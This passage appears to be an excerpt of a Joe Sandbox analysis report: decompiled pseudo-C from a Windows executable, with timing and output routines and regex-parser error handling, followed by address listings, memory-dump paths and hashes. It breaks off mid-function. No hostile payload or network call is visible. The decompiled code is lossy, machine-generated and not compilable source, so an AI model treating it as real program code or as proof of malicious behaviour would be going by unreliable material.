                                                    				intOrPtr* _t401;
                                                    				char* _t402;
                                                    				char* _t403;
                                                    				char* _t404;
                                                    				void* _t405;
                                                    				signed int _t410;
                                                    				intOrPtr* _t414;
                                                    				char* _t415;
                                                    				void* _t418;
                                                    				void* _t420;
                                                    				long long* _t421;
                                                    				long long* _t424;
                                                    				void* _t426;
                                                    				long long* _t427;
                                                    				long long _t430;
                                                    
                                                    				_t430 = __fp0;
                                                    				L004153D0();
                                                    				_t421 = _t420 - 0x18c;
                                                    				_t229 =  *(_t418 + 8);
                                                    				_t320 = __ecx;
                                                    				if(_t229 != 0x1b) {
                                                    					__eflags = _t229 - 0x74;
                                                    					if(_t229 != 0x74) {
                                                    						__eflags = _t229 - 0x75;
                                                    						if(_t229 != 0x75) {
                                                    							__eflags = _t229 - 0x76;
                                                    							if(_t229 == 0x76) {
                                                    								_push(1);
                                                    								L00415334();
                                                    								_push(0x41c994);
                                                    								L004152E6();
                                                    								 *(_t418 + 8) = 0x82;
                                                    								__eflags =  *(__ecx + 0x6c);
                                                    								if( *(__ecx + 0x6c) != 0) {
                                                    									 *(_t418 + 8) = 0x83;
                                                    								}
                                                    								__eflags =  *(_t320 + 0x70);
                                                    								if( *(_t320 + 0x70) != 0) {
                                                    									_t149 = _t418 + 8;
                                                    									 *_t149 =  *(_t418 + 8) | 0x00000004;
                                                    									__eflags =  *_t149;
                                                    								}
                                                    								__eflags =  *(_t320 + 0x74);
                                                    								if( *(_t320 + 0x74) != 0) {
                                                    									_t152 = _t418 + 8;
                                                    									 *_t152 =  *(_t418 + 8) | 0x00000008;
                                                    									__eflags =  *_t152;
                                                    								}
                                                    								_t401 =  *0x417298;
                                                    								 *(_t418 - 0x18) =  *_t401();
                                                    								asm("fild dword [ebp-0x18]");
                                                    								 *(_t418 - 0x14) =  *(_t320 + 0x60);
                                                    								 *((long long*)(_t418 - 0x58)) = _t430;
                                                    								 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
                                                    								 *0x417230(0);
                                                    								 *0x417234( *(_t418 - 0x14), strlen( *(_t418 - 0x14)));
                                                    								 *(_t418 - 4) = 0x10;
                                                    								E00402534(_t418 - 0x198);
                                                    								 *((intOrPtr*)(_t418 - 0x198)) = 0x417660;
                                                    								 *(_t418 - 4) = 0x12;
                                                    								 *0x417230(1, _t418 - 0x28,  *(_t418 + 8), 0);
                                                    								 *((intOrPtr*)(_t418 - 0x3c)) = 0;
                                                    								 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    								 *((intOrPtr*)(_t418 - 0x38)) = 0;
                                                    								 *((intOrPtr*)(_t418 - 0x34)) = 0;
                                                    								 *(_t418 + 8) =  *(_t320 + 0x68);
                                                    								 *(_t418 - 4) = 0x13;
                                                    								 *((char*)(_t418 - 0x74)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    								 *0x417230(0);
                                                    								 *0x417234( *(_t418 + 8), strlen( *(_t418 + 8)));
                                                    								 *(_t418 - 4) = 0x14;
                                                    								_t247 = E004028AC(_t418 - 0x198, _t418 - 0x74, _t418 - 0x40, 0, 0, 0xffffffff);
                                                    								__eflags = _t247;
                                                    								 *(_t418 - 0x44) = _t247;
                                                    								if(_t247 > 0) {
                                                    									 *(_t418 + 8) = 0;
                                                    									 *(_t418 - 0x14) = _t247;
                                                    									do {
                                                    										_t253 =  *((intOrPtr*)(_t418 - 0x3c)) +  *(_t418 + 8);
                                                    										 *(_t418 - 0x18) = _t253;
                                                    										 *((char*)(_t418 - 0x8c)) =  *_t253;
                                                    										 *0x417230(0);
                                                    										_t256 =  *0x41723c; // 0x6cd05df0
                                                    										 *0x417240( *(_t418 - 0x18), 0,  *_t256);
                                                    										_t258 =  *(_t418 - 0x88);
                                                    										 *(_t418 - 4) = 0x15;
                                                    										__eflags = _t258;
                                                    										if(_t258 == 0) {
                                                    											_t258 =  *0x417238; // 0x6cd06082
                                                    										}
                                                    										L0041532E();
                                                    										L0041532E();
                                                    										 *(_t418 - 4) = 0x14;
                                                    										 *0x417230(1, "\r\n---------------------------------------------\r\n", _t258);
                                                    										 *(_t418 + 8) =  &(( *(_t418 + 8))[0x10]);
                                                    										_t207 = _t418 - 0x14;
                                                    										 *_t207 =  *(_t418 - 0x14) - 1;
                                                    										__eflags =  *_t207;
                                                    									} while ( *_t207 != 0);
                                                    								}
                                                    								 *(_t418 + 8) =  *_t401();
                                                    								_t335 = _t418 - 0x10;
                                                    								asm("fild dword [ebp+0x8]");
                                                    								 *((long long*)(_t418 - 0x50)) = _t430;
                                                    								L004152EC();
                                                    								 *(_t418 - 4) = 0x16;
                                                    								 *_t421 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x58));
                                                    								L00415328();
                                                    								L00415322();
                                                    								L0041531C();
                                                    								L00415334();
                                                    								 *(_t418 - 4) = 0x14;
                                                    								L00415214();
                                                    								 *(_t418 - 4) = 0x13;
                                                    								 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x10), _t418 - 0x10, 0x41c128, _t335, _t335,  *(_t418 - 0x44));
                                                    								 *(_t418 - 4) = 0x12;
                                                    								E00402408(_t418 - 0x40);
                                                    								_t224 = _t418 - 4;
                                                    								 *_t224 =  *(_t418 - 4) | 0xffffffff;
                                                    								__eflags =  *_t224;
                                                    								_t342 = _t418 - 0x198;
                                                    								goto L45;
                                                    							}
                                                    						} else {
                                                    							_push(1);
                                                    							L00415334();
                                                    							_push(0x41c994);
                                                    							L004152E6();
                                                    							 *(_t418 + 8) = 0x82;
                                                    							__eflags =  *(__ecx + 0x6c);
                                                    							if( *(__ecx + 0x6c) != 0) {
                                                    								 *(_t418 + 8) = 0x83;
                                                    							}
                                                    							__eflags =  *(_t320 + 0x70);
                                                    							if( *(_t320 + 0x70) != 0) {
                                                    								_t85 = _t418 + 8;
                                                    								 *_t85 =  *(_t418 + 8) | 0x00000004;
                                                    								__eflags =  *_t85;
                                                    							}
                                                    							__eflags =  *(_t320 + 0x74);
                                                    							if(__eflags != 0) {
                                                    								_t88 = _t418 + 8;
                                                    								 *_t88 =  *(_t418 + 8) | 0x00000008;
                                                    								__eflags =  *_t88;
                                                    							}
                                                    							_t414 =  *0x417298;
                                                    							_t261 =  *_t414();
                                                    							_t402 =  *(_t320 + 0x78);
                                                    							 *(_t418 - 0x18) = _t261;
                                                    							asm("fild dword [ebp-0x18]");
                                                    							 *(_t418 - 0x28) =  *((intOrPtr*)(_t418 + 0xb));
                                                    							 *((long long*)(_t418 - 0x48)) = _t430;
                                                    							 *0x417230(0);
                                                    							 *0x417234(_t402, strlen(_t402));
                                                    							_t403 =  *(_t320 + 0x60);
                                                    							 *(_t418 - 4) = 8;
                                                    							 *((char*)(_t418 - 0x9c)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    							 *0x417230(0);
                                                    							 *0x417234(_t403, strlen(_t403));
                                                    							 *(_t418 - 4) = 9;
                                                    							E004025A0(_t418 - 0x144, __eflags);
                                                    							 *((intOrPtr*)(_t418 - 0x144)) = 0x417660;
                                                    							 *(_t418 - 4) = 0xc;
                                                    							 *0x417230(1, _t418 - 0x9c, _t418 - 0x28,  *(_t418 + 8), 0);
                                                    							 *(_t418 - 4) = 0xb;
                                                    							 *0x417230(1);
                                                    							E004023AE(_t418 - 0xcc);
                                                    							_t404 =  *(_t320 + 0x68);
                                                    							 *(_t418 - 4) = 0xd;
                                                    							 *((char*)(_t418 - 0x60)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    							 *0x417230(0, _t418 + 0xb);
                                                    							 *0x417234(_t404, strlen(_t404));
                                                    							_push(0xffffffff);
                                                    							_push(0);
                                                    							_push(_t418 - 0xcc);
                                                    							 *(_t418 - 4) = 0xe;
                                                    							_push(_t418 - 0x60);
                                                    							_push(_t418 - 0x144);
                                                    							_t405 = E00402D2D(_t320, _t404, _t414);
                                                    							_t285 =  *(_t418 - 0x5c);
                                                    							_t424 = _t421 + 0x14;
                                                    							__eflags = _t285;
                                                    							if(_t285 == 0) {
                                                    								_t285 =  *0x417238; // 0x6cd06082
                                                    							}
                                                    							L004152E6();
                                                    							 *(_t418 - 0x18) =  *_t414(_t285);
                                                    							_t365 = _t418 - 0x14;
                                                    							asm("fild dword [ebp-0x18]");
                                                    							 *((long long*)(_t418 - 0x50)) = _t430;
                                                    							L004152EC();
                                                    							 *(_t418 - 4) = 0xf;
                                                    							 *_t424 =  *((long long*)(_t418 - 0x50)) -  *((long long*)(_t418 - 0x48));
                                                    							L00415328();
                                                    							L00415322();
                                                    							L0041531C();
                                                    							L00415334();
                                                    							 *(_t418 - 4) = 0xe;
                                                    							L00415214();
                                                    							 *(_t418 - 4) = 0xd;
                                                    							 *0x417230(1, 0, 0x3ec,  *(_t418 - 0x14), _t418 - 0x14, 0x41c104, _t365, _t365, _t405);
                                                    							 *(_t418 - 4) = 0xb;
                                                    							E004021A6(_t418 - 0xcc);
                                                    							 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
                                                    							_t342 = _t418 - 0x144;
                                                    							L45:
                                                    							_t229 = E00402269(_t342);
                                                    						}
                                                    					} else {
                                                    						_push(1);
                                                    						L00415334();
                                                    						_push(0x41c994);
                                                    						L004152E6();
                                                    						E004024EC(_t418 - 0x2c, _t418 + 0xb);
                                                    						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
                                                    						 *(_t418 - 0x10) = 0x82;
                                                    						__eflags =  *(__ecx + 0x6c);
                                                    						 *(_t418 - 4) = 0;
                                                    						if( *(__ecx + 0x6c) != 0) {
                                                    							 *(_t418 - 0x10) = 0x83;
                                                    						}
                                                    						__eflags =  *(_t320 + 0x70);
                                                    						if( *(_t320 + 0x70) != 0) {
                                                    							_t11 = _t418 - 0x10;
                                                    							 *_t11 =  *(_t418 - 0x10) | 0x00000004;
                                                    							__eflags =  *_t11;
                                                    						}
                                                    						__eflags =  *(_t320 + 0x74);
                                                    						if( *(_t320 + 0x74) != 0) {
                                                    							_t14 = _t418 - 0x10;
                                                    							 *_t14 =  *(_t418 - 0x10) | 0x00000008;
                                                    							__eflags =  *_t14;
                                                    						}
                                                    						_t292 =  *0x417298();
                                                    						_t415 =  *(_t320 + 0x60);
                                                    						 *(_t418 - 0x18) = _t292;
                                                    						asm("fild dword [ebp-0x18]");
                                                    						 *((char*)(_t418 - 0x40)) =  *((intOrPtr*)(_t418 + 0xb));
                                                    						 *((long long*)(_t418 - 0x50)) = _t430;
                                                    						 *0x417230(0);
                                                    						 *0x417234(_t415, strlen(_t415));
                                                    						 *(_t418 - 4) = 1;
                                                    						E00402534(_t418 - 0xf0);
                                                    						 *((intOrPtr*)(_t418 - 0xf0)) = 0x417660;
                                                    						 *(_t418 - 4) = 3;
                                                    						 *0x417230(1, _t418 - 0x40,  *(_t418 - 0x10), 0);
                                                    						 *(_t418 - 0x18) =  *(_t418 - 0xe1);
                                                    						 *(_t418 - 0x10) = 0;
                                                    						_t303 = E00402CEB(_t418 - 0xf0, _t418 - 0x30,  *(_t320 + 0x68));
                                                    						_t426 = _t421 + 0xc;
                                                    						__eflags = _t303;
                                                    						if(_t303 == 0) {
                                                    							_t304 = 0x41cbc0;
                                                    						} else {
                                                    							_t304 = E00402504(_t418 - 0x2c, 0);
                                                    						}
                                                    						_t380 = 6;
                                                    						memcpy(_t418 - 0x7c, _t304, _t380 << 2);
                                                    						_t427 = _t426 + 0xc;
                                                    						asm("movsw");
                                                    						__eflags =  *((char*)(_t418 - 0x74));
                                                    						if( *((char*)(_t418 - 0x74)) != 0) {
                                                    							_t410 = 0;
                                                    							__eflags = 0;
                                                    							while(1) {
                                                    								__eflags =  *(_t418 - 0x28);
                                                    								if( *(_t418 - 0x28) == 0) {
                                                    									goto L21;
                                                    								}
                                                    								_t310 =  *((intOrPtr*)(_t418 - 0x24)) -  *(_t418 - 0x28);
                                                    								_t389 = 0x1a;
                                                    								asm("cdq");
                                                    								__eflags = _t410 - _t310 / _t389;
                                                    								if(_t410 < _t310 / _t389) {
                                                    									_t312 = _t410;
                                                    									asm("cdq");
                                                    									__eflags = _t312 %  *(_t418 - 0x18) - 1;
                                                    									if(_t312 %  *(_t418 - 0x18) == 1) {
                                                    										 *(_t418 - 0x10) =  *(_t418 - 0x10) + 1;
                                                    										_push(_t418 - 0x74);
                                                    										_t317 =  *(E004022E2(E00402504(_t418 - 0x2c, _t410)) + 4);
                                                    										 *(_t418 - 4) = 6;
                                                    										__eflags = _t317;
                                                    										if(_t317 == 0) {
                                                    											_t317 =  *0x417238; // 0x6cd06082
                                                    										}
                                                    										L0041532E();
                                                    										 *(_t418 - 4) = 3;
                                                    										 *0x417230(1, _t317);
                                                    										_push("\r\n---------------------------------------------\r\n");
                                                    										L0041532E();
                                                    									}
                                                    									_t410 = _t410 + 1;
                                                    									continue;
                                                    								}
                                                    								goto L21;
                                                    							}
                                                    						}
                                                    						L21:
                                                    						 *(_t418 - 0x18) =  *0x417298();
                                                    						_t382 = _t418 - 0x14;
                                                    						asm("fild dword [ebp-0x18]");
                                                    						 *((long long*)(_t418 - 0x48)) = _t430;
                                                    						L004152EC();
                                                    						_push( *(_t418 - 0x10));
                                                    						_push(_t382);
                                                    						_push(_t382);
                                                    						 *(_t418 - 4) = 7;
                                                    						 *_t427 =  *((long long*)(_t418 - 0x48)) -  *((long long*)(_t418 - 0x50));
                                                    						_push(0x41c128);
                                                    						_push(_t418 - 0x14);
                                                    						L00415328();
                                                    						_push( *(_t418 - 0x14));
                                                    						_push(0x3ec);
                                                    						L00415322();
                                                    						L0041531C();
                                                    						_push(0);
                                                    						L00415334();
                                                    						 *(_t418 - 4) = 3;
                                                    						L00415214();
                                                    						 *(_t418 - 4) =  *(_t418 - 4) & 0x00000000;
                                                    						E00402269(_t418 - 0xf0);
                                                    						 *(_t418 - 4) =  *(_t418 - 4) | 0xffffffff;
                                                    						 *((intOrPtr*)(_t418 - 0x30)) = 0x417664;
                                                    						_t229 = E00402249();
                                                    					}
                                                    				} else {
                                                    					L00415226();
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t418 - 0xc));
                                                    				return _t229;
                                                    			}









































                                                    0x004020e6
                                                    0x004020f3
                                                    0x004020f7
                                                    0x004020fd
                                                    0x00402101
                                                    0x00402101
                                                    0x00402101
                                                    0x00402101
                                                    0x0040208b
                                                    0x00402108
                                                    0x0040210b
                                                    0x0040210e
                                                    0x00402111
                                                    0x00402114
                                                    0x00402127
                                                    0x0040212b
                                                    0x00402134
                                                    0x00402146
                                                    0x0040214d
                                                    0x00402155
                                                    0x0040215d
                                                    0x00402161
                                                    0x0040216b
                                                    0x0040216f
                                                    0x00402178
                                                    0x0040217c
                                                    0x00402181
                                                    0x00402181
                                                    0x00402181
                                                    0x00402185
                                                    0x00000000
                                                    0x00402185
                                                    0x00401d78
                                                    0x00401d78
                                                    0x00401d7c
                                                    0x00401d84
                                                    0x00401d89
                                                    0x00401d90
                                                    0x00401d97
                                                    0x00401d9a
                                                    0x00401d9c
                                                    0x00401d9c
                                                    0x00401da3
                                                    0x00401da6
                                                    0x00401da8
                                                    0x00401da8
                                                    0x00401da8
                                                    0x00401da8
                                                    0x00401dac
                                                    0x00401daf
                                                    0x00401db1
                                                    0x00401db1
                                                    0x00401db1
                                                    0x00401db1
                                                    0x00401db5
                                                    0x00401dbb
                                                    0x00401dbd
                                                    0x00401dc0
                                                    0x00401dc3
                                                    0x00401dce
                                                    0x00401dd1
                                                    0x00401dd4
                                                    0x00401de6
                                                    0x00401def
                                                    0x00401dfa
                                                    0x00401e01
                                                    0x00401e07
                                                    0x00401e1c
                                                    0x00401e30
                                                    0x00401e3c
                                                    0x00401e41
                                                    0x00401e53
                                                    0x00401e57
                                                    0x00401e62
                                                    0x00401e66
                                                    0x00401e76
                                                    0x00401e7e
                                                    0x00401e86
                                                    0x00401e8a
                                                    0x00401e8d
                                                    0x00401e9f
                                                    0x00401ea5
                                                    0x00401ead
                                                    0x00401eaf
                                                    0x00401eb0
                                                    0x00401eb7
                                                    0x00401ebe
                                                    0x00401ec4
                                                    0x00401ec6
                                                    0x00401ec9
                                                    0x00401ecc
                                                    0x00401ece
                                                    0x00401ed0
                                                    0x00401ed0
                                                    0x00401ed9
                                                    0x00401ee0
                                                    0x00401ee3
                                                    0x00401ee6
                                                    0x00401ee9
                                                    0x00401eec
                                                    0x00401efd
                                                    0x00401f01
                                                    0x00401f0a
                                                    0x00401f1c
                                                    0x00401f23
                                                    0x00401f2c
                                                    0x00401f34
                                                    0x00401f38
                                                    0x00401f42
                                                    0x00401f46
                                                    0x00401f52
                                                    0x00401f56
                                                    0x00401f5b
                                                    0x00401f5f
                                                    0x0040218b
                                                    0x0040218b
                                                    0x0040218b
                                                    0x00401b71
                                                    0x00401b71
                                                    0x00401b75
                                                    0x00401b7d
                                                    0x00401b82
                                                    0x00401b8e
                                                    0x00401b93
                                                    0x00401b9c
                                                    0x00401ba3
                                                    0x00401ba6
                                                    0x00401ba9
                                                    0x00401bab
                                                    0x00401bab
                                                    0x00401bb2
                                                    0x00401bb5
                                                    0x00401bb7
                                                    0x00401bb7
                                                    0x00401bb7
                                                    0x00401bb7
                                                    0x00401bbb
                                                    0x00401bbe
                                                    0x00401bc0
                                                    0x00401bc0
                                                    0x00401bc0
                                                    0x00401bc0
                                                    0x00401bc4
                                                    0x00401bca
                                                    0x00401bcd
                                                    0x00401bd0
                                                    0x00401bda
                                                    0x00401bdd
                                                    0x00401be0
                                                    0x00401bf2
                                                    0x00401c05
                                                    0x00401c0a
                                                    0x00401c0f
                                                    0x00401c1e
                                                    0x00401c22
                                                    0x00401c31
                                                    0x00401c3f
                                                    0x00401c42
                                                    0x00401c47
                                                    0x00401c4a
                                                    0x00401c4c
                                                    0x00401c59
                                                    0x00401c4e
                                                    0x00401c52
                                                    0x00401c52
                                                    0x00401c62
                                                    0x00401c66
                                                    0x00401c66
                                                    0x00401c68
                                                    0x00401c6a
                                                    0x00401c6e
                                                    0x00401c70
                                                    0x00401c70
                                                    0x00401c72
                                                    0x00401c72
                                                    0x00401c76
                                                    0x00000000
                                                    0x00000000
                                                    0x00401c7d
                                                    0x00401c80
                                                    0x00401c81
                                                    0x00401c84
                                                    0x00401c86
                                                    0x00401c88
                                                    0x00401c8a
                                                    0x00401c8e
                                                    0x00401c91
                                                    0x00401c93
                                                    0x00401c99
                                                    0x00401caa
                                                    0x00401cad
                                                    0x00401cb1
                                                    0x00401cb3
                                                    0x00401cb5
                                                    0x00401cb5
                                                    0x00401cc0
                                                    0x00401cca
                                                    0x00401cce
                                                    0x00401cd4
                                                    0x00401cdb
                                                    0x00401cdb
                                                    0x00401ce0
                                                    0x00000000
                                                    0x00401ce0
                                                    0x00000000
                                                    0x00401c86
                                                    0x00401c72
                                                    0x00401ce3
                                                    0x00401ce9
                                                    0x00401cec
                                                    0x00401cef
                                                    0x00401cf2
                                                    0x00401cf5
                                                    0x00401cfa
                                                    0x00401d06
                                                    0x00401d07
                                                    0x00401d08
                                                    0x00401d0c
                                                    0x00401d0f
                                                    0x00401d14
                                                    0x00401d15
                                                    0x00401d1f
                                                    0x00401d22
                                                    0x00401d27
                                                    0x00401d2e
                                                    0x00401d33
                                                    0x00401d37
                                                    0x00401d3f
                                                    0x00401d43
                                                    0x00401d48
                                                    0x00401d52
                                                    0x00401d57
                                                    0x00401d5e
                                                    0x00401d65
                                                    0x00401d65
                                                    0x00401b5e
                                                    0x00401b5e
                                                    0x00401b5e
                                                    0x00402196
                                                    0x0040219e

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.262018164.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.262014608.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000041F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000044F000.00000040.00000001.01000000.00000004.sdmp
                                                    • Associated: 00000004.00000002.262018164.000000000047B000.00000040.00000001.01000000.00000004.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_ifaie.jbxd
                                                    Similarity
                                                    • API ID: H_prologclockstrlen
                                                    • String ID: ---------------------------------------------$+&@$>$@$`vA$`vA$`vA$dvA
                                                    • API String ID: 3760762678-3690534125
                                                    • Opcode ID: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
                                                    • Instruction ID: 3512c44382567f2ea4b4915ac8f057547d101fd7276799898dd384eece168e15
                                                    • Opcode Fuzzy Hash: cb31b7f8cf5ff64ab10fccd60eddeedd65f391d4cee35c01d010414b96f27912
                                                    • Instruction Fuzzy Hash: 4C127131804209EFDF14EFA4CD85BEDBB74BF54304F1440AAF815A7292DBB85A85CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 42%
                                                    			E00404A98(signed int __ebx) {
                                                    				void* _t164;
                                                    				intOrPtr _t174;
                                                    				intOrPtr _t188;
                                                    				signed int _t192;
                                                    				intOrPtr _t193;
                                                    				signed int _t204;
                                                    				intOrPtr _t221;
                                                    				intOrPtr _t222;
                                                    				intOrPtr _t223;
                                                    				intOrPtr _t224;
                                                    				void* _t231;
                                                    				intOrPtr _t233;
                                                    				signed int _t236;
                                                    				intOrPtr* _t262;
                                                    				signed int _t287;
                                                    				signed int _t288;
                                                    				signed int _t290;
                                                    				void* _t294;
                                                    				signed int _t301;
                                                    				signed int _t310;
                                                    				signed char _t311;
                                                    				intOrPtr* _t323;
                                                    				signed int* _t329;
                                                    				char* _t330;
                                                    				intOrPtr _t335;
                                                    				char* _t337;
                                                    				intOrPtr _t338;
                                                    				char* _t339;
                                                    				char* _t340;
                                                    				intOrPtr _t341;
                                                    				void* _t344;
                                                    
                                                    				_t236 = __ebx;
                                                    				 *((char*)(_t344 - 0x15)) = 1;
                                                    				E004079C9(__ebx + 0x43, _t344 + 0xc,  *((intOrPtr*)(__ebx + 0x47)), _t329);
                                                    				 *0x41720c();
                                                    				asm("sbb ecx, ecx");
                                                    				if(E004090FF( *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4), 0xffffffff) == 0) {
                                                    					L4:
                                                    					_t323 =  *((intOrPtr*)(_t236 + 0x27));
                                                    					 *((intOrPtr*)(_t344 - 0x28)) =  *( *(_t344 + 8));
                                                    					 *0x41720c();
                                                    					asm("sbb ecx, ecx");
                                                    					_t164 = E00406D0A( *((intOrPtr*)(_t344 + 0x10)), _t344 - 0x28,  ~( *(_t323 + 4)) &  *((intOrPtr*)(_t323 + 8)) +  *(_t323 + 4));
                                                    					__eflags = _t164 - 0x4b;
                                                    					if(_t164 < 0x4b) {
                                                    						L7:
                                                    						 *((char*)(_t344 - 0x80)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    						 *0x417230(0);
                                                    						_t330 = "bad extension sequence";
                                                    						 *0x417234(_t330, strlen(_t330));
                                                    						 *(_t344 - 4) = 0xd;
                                                    						E00404FA7(_t344 - 0xb0, _t344 - 0x80);
                                                    						_push(0x4196f8);
                                                    						_push(_t344 - 0xb0);
                                                    						 *((intOrPtr*)(_t344 - 0xb0)) = 0x417698;
                                                    						L004153FE();
                                                    						while(1) {
                                                    							 *0x41720c();
                                                    							asm("sbb ecx, ecx");
                                                    							_t174 = E00406B23( *((intOrPtr*)(_t344 + 0x10)), _t323,  ~( *( *((intOrPtr*)(_t236 + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x27)) + 8)) +  *( *((intOrPtr*)(_t236 + 0x27)) + 4));
                                                    							__eflags = _t174 - 2;
                                                    							if(_t174 == 2) {
                                                    								goto L16;
                                                    							}
                                                    							__eflags = _t174;
                                                    							if(_t174 == 0) {
                                                    								_t341 =  *((intOrPtr*)(_t236 + 0x27));
                                                    								 *0x41720c();
                                                    								_t287 =  *(_t341 + 4);
                                                    								_t221 =  *_t323;
                                                    								asm("sbb edx, edx");
                                                    								__eflags = ( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) - _t221;
                                                    								if(( ~_t287 &  *((intOrPtr*)(_t341 + 8)) + _t287) != _t221) {
                                                    									_t222 = _t221 + 1;
                                                    									__eflags = _t222;
                                                    									 *_t323 = _t222;
                                                    								}
                                                    							}
                                                    							_t338 =  *((intOrPtr*)(_t236 + 0x27));
                                                    							 *0x41720c();
                                                    							_t204 =  *(_t338 + 4);
                                                    							asm("sbb ecx, ecx");
                                                    							__eflags = ( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) -  *_t323;
                                                    							if(( ~_t204 &  *((intOrPtr*)(_t338 + 8)) + _t204) !=  *_t323) {
                                                    								continue;
                                                    							} else {
                                                    								 *((char*)(_t344 - 0x90)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    								 *0x417230(0);
                                                    								_t339 = "Expecting end of comment";
                                                    								 *0x417234(_t339, strlen(_t339));
                                                    								 *(_t344 - 4) = 0xe;
                                                    								E00404FA7(_t344 - 0xcc, _t344 - 0x90);
                                                    								 *((intOrPtr*)(_t344 - 0xcc)) = 0x417698;
                                                    								L004153FE();
                                                    								 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    								 *0x417230(0, _t344 - 0xcc, 0x4196f8);
                                                    								_t340 = "bad extension sequence";
                                                    								 *0x417234(_t340, strlen(_t340));
                                                    								 *(_t344 - 4) = 0xf;
                                                    								E00404FA7(_t344 - 0x70, _t344 - 0x48);
                                                    								_push(0x4196f8);
                                                    								_push(_t344 - 0x70);
                                                    								 *((intOrPtr*)(_t344 - 0x70)) = 0x417698;
                                                    								L004153FE();
                                                    								 *_t323 =  *((intOrPtr*)(_t344 - 0x28));
                                                    							}
                                                    							goto L16;
                                                    						}
                                                    					} else {
                                                    						__eflags = _t164 - 0x4e;
                                                    						if(_t164 > 0x4e) {
                                                    							goto L7;
                                                    						} else {
                                                    							_t288 = _t236;
                                                    							_t223 = E00404705(_t288,  *(_t344 + 8), 0,  *((intOrPtr*)(_t344 + 0x10)),  *((intOrPtr*)(_t344 + 0x14)));
                                                    							__eflags = _t223;
                                                    							 *(_t344 - 0x34) = _t288 & 0xffffff00 | __eflags != 0x00000000;
                                                    							 *((intOrPtr*)(_t344 - 0x30)) = _t223;
                                                    							_t290 =  *_t329;
                                                    							 *(_t344 - 4) = 0xc;
                                                    							 *_t329 = _t290 + 1;
                                                    							_push(_t236 + 4);
                                                    							_push(_t223);
                                                    							_push(_t290);
                                                    							_t224 = E004091BE(__eflags);
                                                    							 *((intOrPtr*)(_t344 - 0x1c)) = _t224;
                                                    							__eflags = _t224;
                                                    							 *((char*)(_t344 - 0x20)) = _t290 & 0xffffff00 | _t224 != 0x00000000;
                                                    							E0040BF91(_t344 - 0x14, _t344 - 0x20);
                                                    							E00406ED3(_t344 - 0x20);
                                                    							 *(_t344 - 0x34) =  *(_t344 - 0x34) & 0x00000000;
                                                    							 *(_t344 - 4) =  *(_t344 - 4) & 0x00000000;
                                                    							_t294 = _t344 - 0x34;
                                                    							goto L3;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					 *0x41720c();
                                                    					asm("sbb ecx, ecx");
                                                    					_t231 = E00406B23( *((intOrPtr*)(_t344 + 0x10)),  *(_t344 + 8),  ~( *( *((intOrPtr*)(__ebx + 0x27)) + 4)) &  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x27)) + 8)) +  *( *((intOrPtr*)(__ebx + 0x27)) + 4));
                                                    					_t352 = _t231 - 2;
                                                    					if(_t231 != 2) {
                                                    						goto L4;
                                                    					} else {
                                                    						_t14 =  *_t329 + 1; // 0x1
                                                    						 *_t329 = _t14;
                                                    						_t301 = __ebx + 4;
                                                    						_push(_t301);
                                                    						_push(1);
                                                    						_push( *_t329);
                                                    						_t233 = E00409146(_t301, _t352);
                                                    						 *((intOrPtr*)(_t344 - 0x1c)) = _t233;
                                                    						 *((char*)(_t344 - 0x20)) = _t301 & 0xffffff00 | _t233 != 0x00000000;
                                                    						E0040BF91(_t344 - 0x14, _t344 - 0x20);
                                                    						_t294 = _t344 - 0x20;
                                                    						L3:
                                                    						E00406ED3(_t294);
                                                    					}
                                                    				}
                                                    				L16:
                                                    				_t257 =  *((intOrPtr*)(_t344 - 0x10));
                                                    				if( *((intOrPtr*)(_t344 - 0x10)) != 0) {
                                                    					E00406F41(_t257);
                                                    					do {
                                                    						_push( *((intOrPtr*)(_t344 + 0x14)));
                                                    						_push( *((intOrPtr*)(_t344 + 0x10)));
                                                    						_push( *((intOrPtr*)(_t344 - 0x10)));
                                                    						_push( *(_t344 + 8));
                                                    					} while (E004050B8(_t236) != 0);
                                                    					E00406F61( *((intOrPtr*)(_t344 - 0x10)), _t344 - 0x24, _t236 + 4);
                                                    					_t325 = _t344 - 0x38;
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsb");
                                                    					if( *((char*)(_t344 - 0x15)) != 0) {
                                                    						_t101 =  *((intOrPtr*)(_t344 - 0x10)) + 8; // 0x8
                                                    						if(E00407CC2(_t101) > 2) {
                                                    							 *((char*)(_t344 - 0x48)) =  *((intOrPtr*)(_t344 + 0x13));
                                                    							 *0x417230(0);
                                                    							_t337 = "Too many alternates in conditional subexpression";
                                                    							 *0x417234(_t337, strlen(_t337));
